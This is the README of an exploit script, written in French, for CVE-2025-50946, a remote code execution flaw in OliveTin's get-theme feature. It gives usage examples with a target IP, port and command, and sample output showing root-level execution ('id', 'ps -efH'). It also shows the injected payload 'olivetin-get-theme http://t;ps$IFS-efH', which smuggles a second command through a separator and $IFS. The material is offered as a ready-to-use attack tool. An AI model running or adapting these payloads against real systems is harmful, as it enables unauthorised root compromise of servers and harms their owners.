
Exploit script for CVE-2025-50946
Script d'exploitation pour CVE-2025-50946 (OliveTin get-theme RCE). Les exigences sur les caractères sont capricieuses et de nombreuses commandes comportant plusieurs arguments peuvent ne pas être exécutées correctement. Je n'ai pas pris le temps de rechercher la cause racine ni d'essayer de rendre le script plus robuste. Contactez-moi ou ouvrez une PR si vous avez besoin de quelque chose.
Merci à chrisWalker11 pour la recherche originale sur laquelle j'ai basé ce script : lien
PoC de base :
python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "id"
[*] Target: http://192.168.141.194:1337
[*] Payload: id
[*] Sending payload...
uid=0(root) gid=0(root) groups=0(root)
Liste des processus (montrant seulement un extrait de la sortie) :
python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "ps -efH"
[*] Target: http://192.168.141.194:1337
[*] Payload: ps$IFS-efH
[*] Sending payload...
UID PID PPID C STIME TTY TIME CMD
root 2 0 0 09:20 ? 00:00:00 [kthreadd]
root 1 0 0 09:20 ? 00:00:01 /sbin/init
root 313 1 0 09:20 ? 00:00:00 /usr/lib/systemd/systemd-journald
root 738 1 0 09:20 ? 00:00:00 /usr/sbin/cron -f -P
root 749 1 0 09:20 ? 00:00:00 /usr/local/bin/OliveTin
root 2167 749 0 13:26 ? 00:00:00 sh -c olivetin-get-theme http://t;ps$IFS-efH
root 2168 2167 0 13:26 ? 00:00:00 ps -efH